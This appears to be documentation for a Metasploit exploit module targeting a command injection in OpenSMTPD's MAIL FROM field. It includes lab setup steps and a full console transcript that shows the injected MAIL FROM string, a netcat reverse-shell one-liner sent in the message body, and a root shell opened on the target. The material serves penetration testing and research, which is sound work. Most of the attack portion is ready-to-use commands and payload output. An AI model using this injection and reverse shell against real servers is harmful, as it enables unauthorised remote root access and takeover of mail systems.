## Vulnerable Application ### Description This module exploits a command injection in the `MAIL FROM` field during SMTP interaction with OpenSMTPD to execute code as the root user. ### Setup 1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso) 2. Install the system, noting the domain name (defaults to `foo.my.domain`) 3. Configure the following settings in `/etc/mail/smtpd.conf`: * `listen on all` * `match from any for domain "foo.my.domain" action "local_mail"` 4. Execute `/etc/rc.d/smtpd restart` to restart OpenSMTPD 5. Execute `ifconfig` and look for an appropriate target IP ### Targets ``` Id Name -- ---- 0 OpenSMTPD >= commit a8e222352f ``` ## Verification Steps Follow [Setup](#setup) and [Scenarios](#scenarios). ## Options **RCPT_TO** Set this to a valid mail recipient. The default is `root`. ## Scenarios ### OpenSMTPD 6.6.0 on OpenBSD 6.6 ``` msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing Module options (exploit/unix/smtp/opensmtpd_mail_from_rce): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 192.168.56.133 rhosts => 192.168.56.133 msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 192.168.56.1 lhost => 192.168.56.1 msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.133:25 - Connecting to OpenSMTPD [*] 192.168.56.133:25 - Saying hello and sending exploit [*] 192.168.56.133:25 - Expecting: /220.*OpenSMTPD/ [+] 192.168.56.133:25 - Received: 220 foo.my.domain ESMTP OpenSMTPD [*] 192.168.56.133:25 - Sending: HELO oKFMWnrTJZjTbzkGfVMsyDy7pO35ze [*] 192.168.56.133:25 - Expecting: /250.*pleased to meet you/ [+] 192.168.56.133:25 - Received: 250 foo.my.domain Hello oKFMWnrTJZjTbzkGfVMsyDy7pO35ze [192.168.56.1], pleased to meet you [*] 192.168.56.133:25 - Sending: MAIL FROM:<;for J in V e E n U T w v A K M a 0 s x;do read;done;sh;exit 0;> [*] 192.168.56.133:25 - Expecting: /250.*Ok/ [+] 192.168.56.133:25 - Received: 250 2.0.0 Ok [*] 192.168.56.133:25 - Sending: RCPT TO: [*] 192.168.56.133:25 - Expecting: /250.*Recipient ok/ [+] 192.168.56.133:25 - Received: 250 2.1.5 Destination address valid: Recipient ok [*] 192.168.56.133:25 - Sending: DATA [*] 192.168.56.133:25 - Expecting: /354 Enter mail.*itself/ [+] 192.168.56.133:25 - Received: 354 Enter mail, end with "." on a line by itself [*] 192.168.56.133:25 - Sending: # # # # # # # # # # # # # # # mkfifo /tmp/eizzy; nc 192.168.56.1 4444 0/tmp/eizzy 2>&1; rm /tmp/eizzy [*] 192.168.56.133:25 - Sending: . [*] 192.168.56.133:25 - Expecting: /250.*Message accepted for delivery/ [+] 192.168.56.133:25 - Received: 250 2.0.0 ccd8e419 Message accepted for delivery [*] 192.168.56.133:25 - Sending: QUIT [*] 192.168.56.133:25 - Expecting: /221.*Bye/ [+] 192.168.56.133:25 - Received: 221 2.0.0 Bye [*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.133:16126) at 2020-02-05 16:16:59 -0600 id uid=0(root) gid=0(wheel) groups=0(wheel) uname -a OpenBSD foo.my.domain 6.6 GENERIC#353 amd64 ```